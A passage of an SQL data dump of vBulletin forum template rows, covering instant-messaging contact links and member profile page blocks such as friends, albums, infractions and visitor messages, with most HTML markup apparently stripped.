(1349, -1, 'im_msn', ' ', ' $vbphrase[send_message_via_msn_to_x]\" border=\"0\" /> ', 'template', 1119876702, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'),
(1350, -1, 'im_send_aim', '\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[aim]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n \" . construct_phrase(\"$vbphrase[send_message_via_aim_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" (
$userinfo[aim] )\r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n $vbphrase[these_functions_require_aim]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', '\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[aim]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n
$vbphrase[send_message_via_aim_to_x_link] (
$userinfo[aim] )\r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n $vbphrase[these_functions_require_aim]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', 'template', 1131124247, 'vBulletin Solutions', '3.5.2', 'vbulletin'),
(1351, -1, 'im_send_icq', '\r\n\r\n\r\n\r\n ', '\r\n\r\n\r\n\r\n ', 'template', 1206451803, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1352, -1, 'im_send_msn', ' \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[msn]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n \" . construct_phrase(\"$vbphrase[send_message_via_msn_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \"
($userinfo[msn] ) \r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n $vbphrase[these_functions_require_msn]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', ' \r\n\r\n\r\n\r\n\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[msn]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n
$vbphrase[send_message_via_msn_to_x_link] ($userinfo[msn] ) \r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n $vbphrase[these_functions_require_msn]\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', 'template', 1165255282, 'vBulletin Solutions', '3.6.6', 'vbulletin'),
(1353, -1, 'im_send_skype', '\r\n', '\r\n', 'template', 1200590527, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1354, -1, 'im_send_yahoo', '\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[yahoo]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n
\r\n \" . construct_phrase(\"$vbphrase[send_message_via_yahoo_to_x_link]\", \"member.php?\" . $GLOBALS[\'vbulletin\']->session->vars[\'sessionurl\'] . \"u=$userinfo[userid]\", \"$userinfo[username]\") . \" (
$userinfo[yahoo] )\r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', '\r\n\r\n \r\n $vbphrase[close_this_window] \r\n $vbphrase[yahoo]\r\n \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n
\r\n
\r\n
$vbphrase[send_message_via_yahoo_to_x_link] (
$userinfo[yahoo] )\r\n
\r\n\r\n
\r\n\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n
', 'template', 1222166916, 'vBulletin Solutions', '3.8.0 Alpha 2', 'vbulletin'),
(1355, -1, 'im_skype', ' options[\'skypeweb_gfx\']) ? (\"http://mystatus.skype.com/smallicon/$userinfo[skypeencoded]\") : (\"$stylevar[imgdir_misc]/im_skype.gif\")).\"\\\" alt=\\\"\" . construct_phrase(\"$vbphrase[send_message_via_skype_to_x]\", \"$userinfo[username]\") . \"\\\" border=\\\"0\\\" /> ', ' http://mystatus.skype.com/smallicon/$userinfo[skypeencoded] $stylevar[imgdir_misc]/im_skype.gif \" alt=\"$vbphrase[send_message_via_skype_to_x] \" border=\"0\" /> ', 'template', 1193048443, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1356, -1, 'im_yahoo', ' ', ' $vbphrase[send_message_via_yahoo_to_x]\" border=\"0\" /> ', 'template', 1119876714, 'vBulletin Solutions', '3.5.0 Beta 3', 'vbulletin'),
(1357, -1, 'MEMBERINFO', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $vbphrase[view_profile]: $userinfo[username] \r\n\r\n\".(($userinfo[\'userid\'] == $GLOBALS[\'vbulletin\']->userinfo[\'userid\']) ? (\"\r\n\r\n\") : (\"\")).\"\r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n
\r\n
\r\n\r\n
\r\n
\r\n \r\n \".(($blocks[\'profile_picture\']) ? (\"\r\n $blocks[profile_picture] \r\n \") : (\"\")).\"\r\n \r\n \".(($prepared[\'rank\'] OR $prepared[\'reputationdisplay\']) ? (\"\r\n \r\n \".(($prepared[\'reputationdisplay\']) ? (\"\r\n
$prepared[reputationdisplay]
\r\n \") : (\"\")).\"\r\n \".(($prepared[\'rank\']) ? (\"\r\n
$prepared[rank]
\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n $prepared[musername] $prepared[onlinestatus] \r\n \".(($prepared[\'usertitle\']) ? (\"\r\n $prepared[usertitle] \r\n \") : (\"\")).\"\r\n \r\n \r\n
\r\n\r\n \r\n
\r\n \".(($prepared[\'myprofile\'] OR $show[\'usercss_switch\'] OR $show[\'contactlinks\'] OR $show[\'userlists\'] OR $show[\'usernotes\'] OR $show[\'edit_profile\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\r\n \r\n \".(($prepared[\'lastactivitydate\'] OR $prepared[\'action\']) ? (\"\r\n
\r\n \".(($prepared[\'lastactivitydate\']) ? (\"\r\n
\r\n $vbphrase[last_activity]: $prepared[lastactivitydate]\".((!$show[\'detailedtime\']) ? (\" $prepared[lastactivitytime] \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n \".(($prepared[\'action\']) ? (\"\r\n
$vbphrase[current_activity]: $prepared[action] $prepared[where]\r\n \") : (\"\")).\"\r\n
\r\n \") : (\"\")).\"\r\n \r\n\r\n
\r\n \r\n\r\n \r\n \r\n\r\n \".(($show[\'contactlinks\']) ? (\"\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n
\r\n\r\n
\r\n $template_hook[profile_left_first]\r\n $blocks[visitor_messaging]\r\n $blocks[aboutme]\r\n $blocks[stats]\r\n $blocks[friends]\r\n $blocks[infractions]\r\n $blocks[contactinfo]\r\n $template_hook[profile_left_last]\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n\r\n$usercss\r\n$memberinfo_css\r\n\r\n\r\n\r\n\r\n\r\n\r\n$vboptions[bbtitle] - $vbphrase[view_profile]: $userinfo[username] \r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n\r\n$header\r\n$navbar\r\n\r\n\r\n\r\n\r\n\r\n
\r\n
\r\n\r\n
\r\n
\r\n \r\n \r\n $blocks[profile_picture] \r\n \r\n class=\"profilepic_adjacent\">\r\n \r\n \r\n
\r\n $prepared[reputationdisplay]
\r\n \r\n
\r\n $prepared[rank]
\r\n \r\n
\r\n \r\n $prepared[musername] $prepared[onlinestatus] \r\n \r\n $prepared[usertitle] \r\n \r\n \r\n \r\n
\r\n\r\n \r\n
\r\n
\r\n \r\n \r\n\r\n \r\n
\r\n \r\n
\r\n \r\n $vbphrase[last_activity]: $prepared[lastactivitydate] $prepared[lastactivitytime] \r\n
\r\n \r\n
\r\n $vbphrase[current_activity]: $prepared[action] $prepared[where]\r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n\r\n \r\n \r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n
\r\n\r\n
\r\n $template_hook[profile_left_first]\r\n $blocks[visitor_messaging]\r\n $blocks[aboutme]\r\n $blocks[stats]\r\n $blocks[friends]\r\n $blocks[infractions]\r\n $blocks[contactinfo]\r\n $template_hook[profile_left_last]\r\n
\r\n\r\n \r\n\r\n
\r\n
\r\n\r\n\r\n\r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1249925853, 'vBulletin Solutions', '3.8.4', 'vbulletin'),
(1358, -1, 'memberinfo_albumbit', '\r\n \".(($album[\'coverthumburl\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"albumid=$album[albumid]\\\"> \r\n \") : (\"\")).\"\r\n \r\n\r\n \".(($album[\'lastpicturedate\']) ? (\"\r\n $album[picturedate]\".((!$show[\'detailedtime\']) ? (\"
$album[picturetime] \") : (\"\")).\"\r\n \") : (\"\r\n
$vbphrase[n_a]\r\n \")).\"\r\n \".(($show[\'moderated\']) ? (\"
\") : (\"\")).\"\r\n
\r\n', '
\r\n \r\n \r\n \r\n \r\n\r\n \r\n $album[picturedate]
$album[picturetime] \r\n
\r\n
$vbphrase[n_a]\r\n \r\n
$vbphrase[x_moderated_pictures]\" /> \r\n
\r\n', 'template', 1203660803, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1359, -1, 'memberinfo_block', '\r\n
\r\n
\r\n \r\n \r\n $title \r\n \r\n
$html
\r\n
\r\n', '\r\n
\r\n
\r\n \r\n \r\n $title \r\n \r\n
$html
\r\n
\r\n', 'template', 1197973387, 'vBulletin Solutions', '3.7.0 Beta 3', 'vbulletin'),
(1360, -1, 'memberinfo_block_aboutme', '
\r\n\".(($show[\'simple_link\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n\".(($show[\'edit_link\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n
\r\n $block_data[fields]\r\n \".(($prepared[\'signature\']) ? (\"\r\n \r\n $vbphrase[signature]\r\n $prepared[signature] \r\n \r\n \") : (\"\")).\"\r\n \r\n
', '
\r\n
\r\n \r\n \r\n
\r\n \r\n \r\n
\r\n $block_data[fields]\r\n \r\n \r\n $vbphrase[signature]\r\n $prepared[signature] \r\n \r\n \r\n \r\n
', 'template', 1227014875, 'vBulletin Solutions', '3.8.0 Beta 3', 'vbulletin'),
(1361, -1, 'memberinfo_block_albums', '\".(($block_data[\'albumbits\']) ? (\"\r\n
\r\n $block_data[albumbits]\r\n \r\n
\r\n\") : (\"\r\n
$vbphrase[you_have_not_created_any_albums]
\r\n
\r\n\")).\"\r\n', '
\r\n \r\n $block_data[albumbits]\r\n \r\n \r\n \r\n $vbphrase[you_have_not_created_any_albums]
\r\n \r\n \r\n', 'template', 1194961850, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1362, -1, 'memberinfo_block_contactinfo', '
\r\n\".(($show[\'messagelinks\']) ? (\"\r\n
\r\n \" . construct_phrase(\"$vbphrase[send_message_to_x]\", \"$prepared[username]\") . \" \r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n \".(($prepared[\'hasimdetails\']) ? (\"\r\n
\r\n $vbphrase[instant_messaging] \r\n \r\n
\" . construct_phrase(\"$vbphrase[send_instant_message_to_x_using]\", \"$prepared[username]\") . \"
\r\n
\r\n $block_data[imbits]\r\n \r\n
\r\n \r\n \") : (\"\")).\"\r\n\r\n
\r\n \".(($prepared[\'displayemail\']) ? (\"\r\n $vbphrase[email_address] \r\n $prepared[displayemail] \r\n \") : (\"\")).\"\r\n \".(($prepared[\'homepage\']) ? (\"\r\n $vbphrase[home_page] \r\n $prepared[homepage] \r\n \") : (\"\")).\"\r\n $vbphrase[this_page] \r\n $prepared[profileurl] \r\n \".(($show[\'vcard\']) ? (\"\r\n $vbphrase[vcard] \r\n session->vars[\'sessionurl\'] . \"do=vcard&u=$prepared[userid]\\\" rel=\\\"nofollow\\\">$vbphrase[download_vcard] \r\n \") : (\"\")).\"\r\n \r\n
', '
\r\n
\r\n \r\n $vbphrase[send_message_to_x] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[instant_messaging] \r\n \r\n
$vbphrase[send_instant_message_to_x_using] \r\n
\r\n $block_data[imbits]\r\n \r\n
\r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[email_address] \r\n $prepared[displayemail] \r\n \r\n \r\n $vbphrase[home_page] \r\n $prepared[homepage] \r\n \r\n $vbphrase[this_page] \r\n $prepared[profileurl] \r\n \r\n $vbphrase[vcard] \r\n $vbphrase[download_vcard] \r\n \r\n \r\n
', 'template', 1280346984, 'vBulletin Solutions', '3.8.5', 'vbulletin'),
(1363, -1, 'memberinfo_block_friends', '\".(($block_data[\'friendbits\']) ? (\"\r\n
\r\n
\r\n $block_data[friendbits]\r\n \r\n \".(($block_data[\'pagenav\']) ? (\"\r\n
\r\n $block_data[pagenav]\r\n
\r\n \") : (\"\")).\"\r\n\") : (\"\r\n
\r\n \".(($prepared[\'myprofile\']) ? (\"\r\n $vbphrase[your_friends_list_is_empty]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_has_not_made_any_friends_yet]\", \"$prepared[username]\") . \"\r\n \")).\"\r\n
\r\n \".(($prepared[\'myprofile\'] OR $prepared[\'canbefriend\']) ? (\"\r\n
\r\n \") : (\"\")).\"\r\n\")).\"', '
\r\n \r\n \r\n $block_data[friendbits]\r\n \r\n \r\n \r\n $block_data[pagenav]\r\n
\r\n \r\n \r\n \r\n
\r\n $vbphrase[your_friends_list_is_empty]\r\n \r\n $vbphrase[x_has_not_made_any_friends_yet] \r\n \r\n
\r\n \r\n \r\n \r\n ', 'template', 1200666301, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1364, -1, 'memberinfo_block_friends_mini', '
\r\n \".(($block_data[\'friendbits\']) ? (\"\r\n
\" . construct_phrase(\"$vbphrase[showing_x_of_y_friends]\", \"$block_data[showtotal]\", \"$prepared[friendcount]\") . \"
\r\n
\r\n \") : (\"\".(($prepared[\'myprofile\']) ? (\"\r\n $vbphrase[your_friends_list_is_empty]\r\n \") : (\"\r\n \" . construct_phrase(\"$vbphrase[x_has_not_made_any_friends_yet]\", \"$prepared[username]\") . \"\r\n \")).\"\")).\"\r\n
\r\n
', '
\r\n
\r\n $vbphrase[showing_x_of_y_friends] \r\n \r\n \r\n $vbphrase[your_friends_list_is_empty]\r\n \r\n $vbphrase[x_has_not_made_any_friends_yet] \r\n \r\n
\r\n
', 'template', 1200666309, 'vBulletin Solutions', '3.7.0 Beta 4', 'vbulletin'),
(1365, -1, 'memberinfo_block_groups', '\".(($block_data[\'membergroupcount\']) ? (\"\r\n
\r\n
($block_data[membergroupcount]) $vbphrase[public_usergroups]:\r\n
\r\n $block_data[membergroupbits]\r\n \r\n
\r\n\") : (\"\")).\"\r\n\".(($block_data[\'socialgroupcount\']) ? (\"\r\n
\r\n
($block_data[socialgroupcount]) $vbphrase[user_created_social_groups]:\r\n
\r\n $block_data[socialgroupbits]\r\n \r\n
\r\n\") : (\"\")).\"\r\n\".((!$block_data[\'membergroupcount\'] AND !$block_data[\'socialgroupcount\']) ? (\"\r\n
$vbphrase[you_not_member_any_groups]
\r\n\") : (\"\")).\"\r\n\".(($block_data[\'show_join_link\']) ? (\"\r\n
\r\n\") : (\"\")).\"', '
\r\n \r\n
($block_data[membergroupcount]) $vbphrase[public_usergroups]:\r\n
\r\n $block_data[membergroupbits]\r\n \r\n
\r\n \r\n
\r\n \r\n
($block_data[socialgroupcount]) $vbphrase[user_created_social_groups]:\r\n
\r\n $block_data[socialgroupbits]\r\n \r\n
\r\n \r\n
\r\n $vbphrase[you_not_member_any_groups]
\r\n \r\n
\r\n \r\n ', 'template', 1218539988, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1366, -1, 'memberinfo_block_infractions', '
\r\n\r\n \r\n \" . construct_phrase(\"$vbphrase[x_points_total]\", \"$userinfo[ipoints]\") . \" \r\n \".(($show[\'giveinfraction\']) ? (\"\r\n session->vars[\'sessionurl\'] . \"do=report&u=$userinfo[userid]\\\">$vbphrase[give_infraction] \r\n \") : (\"\")).\"\r\n \r\n \r\n\".(($block_data[\'infractionbits\']) ? (\"\r\n\r\n \r\n $vbphrase[post] / $vbphrase[reason] \r\n $vbphrase[date] / $vbphrase[posted_by] \r\n $vbphrase[points] / $vbphrase[expires] \r\n \".(($show[\'reverse\']) ? (\"$vbphrase[view] \") : (\"\")).\"\r\n \r\n\r\n$block_data[infractionbits]\r\n\") : (\"\")).\"\r\n
\r\n\r\n\".(($block_data[pagenav]) ? (\"\r\n\r\n\") : (\"\")).\"', '
\r\n\r\n 5 4\">\r\n $vbphrase[x_points_total] \r\n \r\n $vbphrase[give_infraction] \r\n \r\n \r\n \r\n\r\n\r\n \r\n $vbphrase[post] / $vbphrase[reason] \r\n $vbphrase[date] / $vbphrase[posted_by] \r\n $vbphrase[points] / $vbphrase[expires] \r\n $vbphrase[view] \r\n \r\n\r\n$block_data[infractionbits]\r\n \r\n
\r\n\r\n
\r\n\r\n ', 'template', 1212413850, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1367, -1, 'memberinfo_block_ministats', '
\r\n
\r\n \r\n \r\n \r\n \".(($prepared[\'birthday\']) ? (\"\r\n $vbphrase[birth_date] \r\n $prepared[birthday] \".(($prepared[\'age\']) ? (\"($prepared[age])\") : (\"\")).\" \r\n \") : (\"\".(($prepared[\'age\']) ? (\"\r\n $vbphrase[age] \r\n $prepared[age] \r\n \") : (\"\")).\"\")).\"\r\n $vbphrase[join_date] \r\n $prepared[joindate] \r\n $vbphrase[total_posts] \r\n $prepared[posts] \r\n $template_hook[profile_ministats_list]\r\n \r\n \r\n \".(($prepared[\'avatarurl\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n \r\n
\r\n
\r\n
', '
\r\n
\r\n \r\n \r\n \r\n \r\n $vbphrase[birth_date] \r\n $prepared[birthday] ($prepared[age]) \r\n \r\n $vbphrase[age] \r\n $prepared[age] \r\n \r\n $vbphrase[join_date] \r\n $prepared[joindate] \r\n $vbphrase[total_posts] \r\n $prepared[posts] \r\n $template_hook[profile_ministats_list]\r\n \r\n \r\n \r\n $vbphrase[xs_avatar]\" $prepared[avatarsize] class=\"alt2\" id=\"user_avatar\" /> \r\n \r\n \r\n
\r\n
\r\n
', 'template', 1196961753, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1368, -1, 'memberinfo_block_profilefield', '\".(($show[\'profile_category_title\']) ? (\"\r\n
\r\n$block_data[fields]\r\n \r\n\") : (\"\r\n$block_data[fields]\r\n\")).\"', '
\r\n\r\n$block_data[fields]\r\n \r\n \r\n$block_data[fields]\r\n ', 'template', 1194528568, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1369, -1, 'memberinfo_block_profilepicture', '
', '
$vbphrase[xs_picture]\" />', 'template', 1215173058, 'vBulletin Solutions', '3.8.0 Alpha 1', 'vbulletin'),
(1370, -1, 'memberinfo_block_recentvisitors', '\".(($block_data[\'visitorcount\']) ? (\"\r\n
\r\n \" . construct_phrase(\"$vbphrase[last_x_visitors]\", \"$block_data[visitorcount]\") . \"\r\n
\r\n $block_data[visitorbits]\r\n \r\n
\r\n\") : (\"\")).\"\r\n
\r\n \" . construct_phrase(\"$vbphrase[this_page_has_x_visits]\", \"$prepared[profilevisits]\") . \"\r\n
', '
\r\n\r\n
$vbphrase[last_x_visitors] \r\n
\r\n $block_data[visitorbits]\r\n \r\n
\r\n \r\n
alt2
alt1 smallfont block_row block_footer\">\r\n
$vbphrase[this_page_has_x_visits] \r\n
', 'template', 1196289604, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1371, -1, 'memberinfo_block_statistics', '
\r\n $template_hook[profile_stats_first]\r\n\r\n
\r\n $vbphrase[total_posts] \r\n \r\n \r\n\r\n \".(($show[\'album_block\']) ? (\"\r\n
\r\n $vbphrase[albums] \r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'vm_block\']) ? (\"\r\n
\r\n $vbphrase[visitor_messages] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'usernote_block\']) ? (\"\r\n
\r\n $vbphrase[user_notes] \r\n \r\n \r\n \") : (\"\")).\"\r\n\r\n $template_hook[profile_stats_pregeneral]\r\n\r\n
\r\n $vbphrase[general_information] \r\n \r\n \".(($prepared[\'lastactivitydate\']) ? (\"\r\n $vbphrase[last_activity]: $prepared[lastactivitydate] \".((!$show[\'detailedtime\']) ? (\"$prepared[lastactivitytime] \") : (\"\")).\" \r\n \") : (\"\")).\"\r\n \".(($prepared[\'action\']) ? (\"\r\n $vbphrase[current_activity]: $prepared[action] $prepared[where] \r\n \") : (\"\")).\"\r\n $vbphrase[join_date]: $prepared[joindate] \r\n \".(($GLOBALS[\'vbulletin\']->options[\'usereferrer\']) ? (\"$vbphrase[referrals]: $prepared[referrals] \") : (\"\")).\"\r\n \".(($prepared[\'homepage\']) ? (\"\r\n $vbphrase[home_page]: $prepared[homepage] \r\n \") : (\"\")).\"\r\n \r\n \r\n\r\n $template_hook[profile_stats_last]\r\n
', '
\r\n $template_hook[profile_stats_first]\r\n\r\n
\r\n $vbphrase[total_posts] \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[albums] \r\n \r\n \r\n \r\n
\r\n \r\n $vbphrase[visitor_messages] \r\n \r\n \r\n \r\n\r\n
\r\n \r\n $vbphrase[user_notes] \r\n \r\n \r\n \r\n\r\n $template_hook[profile_stats_pregeneral]\r\n\r\n
\r\n $vbphrase[general_information] \r\n \r\n \r\n $vbphrase[last_activity]: $prepared[lastactivitydate] $prepared[lastactivitytime] \r\n \r\n \r\n $vbphrase[current_activity]: $prepared[action] $prepared[where] \r\n \r\n $vbphrase[join_date]: $prepared[joindate] \r\n $vbphrase[referrals]: $prepared[referrals] \r\n \r\n $vbphrase[home_page]: $prepared[homepage] \r\n \r\n \r\n \r\n\r\n $template_hook[profile_stats_last]\r\n
', 'template', 1203448672, 'vBulletin Solutions', '3.7.0 Beta 6', 'vbulletin'),
(1372, -1, 'memberinfo_block_visitormessaging', '\".((($show[\'quickcomment\'] AND $show[\'post_visitor_message\']) OR $show[\'hasedit\']) ? (\"\r\n $block_data[clientscript]\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\'] AND $show[\'post_visitor_message\']) ? (\"\r\n
\r\n
session->vars[\'sessionurl\'] . \"do=message\\\" method=\\\"post\\\" name=\\\"vbform\\\" id=\\\"message_form\\\">\r\n \r\n\r\n \r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n \r\n
\r\n\") : (\"\")).\"\r\n\r\n\".(($block_data[\'messagebits\']) ? (\"\r\n
\r\n \".(($show[\'inlinemod\']) ? (\"
\") : (\"\")).\"\r\n \" . construct_phrase(\"$vbphrase[showing_vms_x_to_y_of_z]\", \"$block_data[messagestart]\", \"$block_data[messageend]\", \"$prepared[vm_total]\") . \"\r\n
\r\n \r\n\".(($show[\'inlinemod\']) ? (\"\r\n
\r\n\") : (\"\")).\"\r\n \r\n $block_data[messagebits]\r\n \r\n\r\n \".(($show[\'inlinemod\'] OR $block_data[\'pagenav\']) ? (\"\r\n \r\n \") : (\"\")).\"\r\n\") : (\"\")).\"\r\n\r\n\".(($show[\'quickcomment\']) ? (\"\r\n \r\n \r\n\") : (\"\")).\"\r\n\r\n\".(($block_data[\'messagebits\']) ? (\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n \r\n \") : (\"\")).\"\r\n \".(($show[\'inlinemod\']) ? (\"\r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \") : (\"\")).\"\r\n\") : (\"\r\n \".(($block_data[\'fromconverse\']) ? (\"\r\n
$vbphrase[no_visitor_messages_between_members]
\r\n \") : (\"\r\n
\" . construct_phrase(\"$vbphrase[x_has_no_visitor_messages]\", \"$prepared[username]\") . \"
\r\n \")).\"\r\n\")).\"\r\n\r\n\".(($show[\'hasedit\'] AND $show[\'popups\']) ? (\"\r\n\r\n
\r\n\r\n\") : (\"\")).\"', '
\r\n $block_data[clientscript]\r\n \r\n\r\n
\r\n \r\n
\r\n \r\n\r\n \r\n
\r\n
$vbphrase[posting_message_please_wait] \r\n
\r\n \r\n
\r\n \r\n\r\n
\r\n \r\n
\r\n
$vbphrase[showing_vms_x_to_y_of_z] \r\n
\r\n \r\n\r\n \r\n \r\n \r\n $block_data[messagebits]\r\n \r\n\r\n \r\n \r\n \r\n \r\n\r\n
\r\n \r\n \r\n \r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n \r\n \r\n\r\n \r\n \r\n \r\n \r\n \r\n \r\n $vbphrase[no_visitor_messages_between_members]
\r\n \r\n $vbphrase[x_has_no_visitor_messages] \r\n \r\n \r\n\r\n
\r\n\r\n \r\n\r\n ', 'template', 1280529003, 'vBulletin Solutions', '3.8.7 Beta 1', 'vbulletin'),
(1373, -1, 'memberinfo_css', '', '', 'template', 1207049926, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1374, -1, 'memberinfo_customfield_edit', '
\r\n\r\n \r\n $custom_field_holder\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n \r\n ', '
\r\n\r\n \r\n $custom_field_holder\r\n
\r\n
\r\n
\r\n
\r\n
\r\n
\r\n \r\n ', 'template', 1196331036, 'vBulletin Solutions', '3.7.0 Beta 1', 'vbulletin'),
(1375, -1, 'memberinfo_deletemessages', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
\" . $GLOBALS[\'vbulletin\']->options[\'bbtitle\'] . \" - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n session->vars[\'sessionhash\'] . \"\\\" />\r\n userinfo[\'securitytoken\'] . \"\\\" />\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_messages] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n \".(($show[\'deleteoption\']) ? (\"\r\n
$vbphrase[how_would_you_like_to_delete]
\r\n \") : (\"\")).\"\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
\r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'removemessages\']) ? (\"\r\n
\r\n $vbphrase[physically_remove] \r\n
\r\n \") : (\"\")).\"\r\n\r\n \".(($show[\'deletemessages\']) ? (\"\r\n
\r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \") : (\"\")).\"\r\n
\r\n \r\n\r\n
\" . construct_phrase(\"$vbphrase[deleting_x_messages_from_y_user_profiles]\", \"$messagecount\", \"$usercount\") . \"
\r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', '$stylevar[htmldoctype]\r\n\r\n\r\n$headinclude\r\n
$vboptions[bbtitle] - $pagetitle \r\n\r\n\r\n$header\r\n$navbar\r\n\r\n
\r\n \r\n \r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n $vbphrase[delete_messages] \r\n \r\n\r\n \r\n \r\n
\r\n\r\n
\r\n $vbphrase[deletion_options] \r\n \r\n
\r\n $vbphrase[how_would_you_like_to_delete]
\r\n \r\n
\r\n \r\n $vbphrase[soft_delete_leave_deleted_message] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[physically_remove] \r\n
\r\n \r\n\r\n
\r\n \r\n $vbphrase[reason_for_deletion]\r\n \r\n \r\n
\r\n \r\n
\r\n \r\n\r\n
$vbphrase[deleting_x_messages_from_y_user_profiles] \r\n\r\n
\r\n
\r\n\r\n \r\n \r\n \r\n
\r\n \r\n \r\n
\r\n\r\n \r\n\r\n
\r\n\r\n$footer\r\n\r\n\r\n', 'template', 1208875871, 'vBulletin Solutions', '3.7.0 Release Candidate 4', 'vbulletin'),
(1376, -1, 'memberinfo_imbit', '
\r\n \".((!$show[\'textimicons\']) ? (\"$imicon \") : (\"\")).\"\r\n $imtitle \r\n $imusername \r\n ', '
\r\n $imicon \r\n $imtitle \r\n $imusername \r\n ', 'template', 1207049941, 'vBulletin Solutions', '3.7.0 Release Candidate 2', 'vbulletin'),
(1377, -1, 'memberinfo_infractionbit', '
\r\n \r\n \r\n \r\n \".(($infraction[postid]) ? (\"\r\n \".(($show[\'postdeleted\']) ? (\"\r\n
$vbphrase[n_a] \r\n \") : (\"\".(($show[\'threadtitle\']) ? (\"\r\n
session->vars[\'sessionurl\'] . \"p=$infraction[postid]#post$infraction[postid]\\\">$infraction[title] \r\n \") : (\"\r\n
$vbphrase[private] \r\n \")).\"\")).\"\r\n \") : (\"\r\n \".(($infraction[\'points\']) ? (\"\r\n $vbphrase[profile_infraction]\r\n \") : (\"\r\n $vbphrase[profile_warning]\r\n \")).\"\r\n \")).\"\r\n
\r\n $vbphrase[reason]: $infraction[reason]
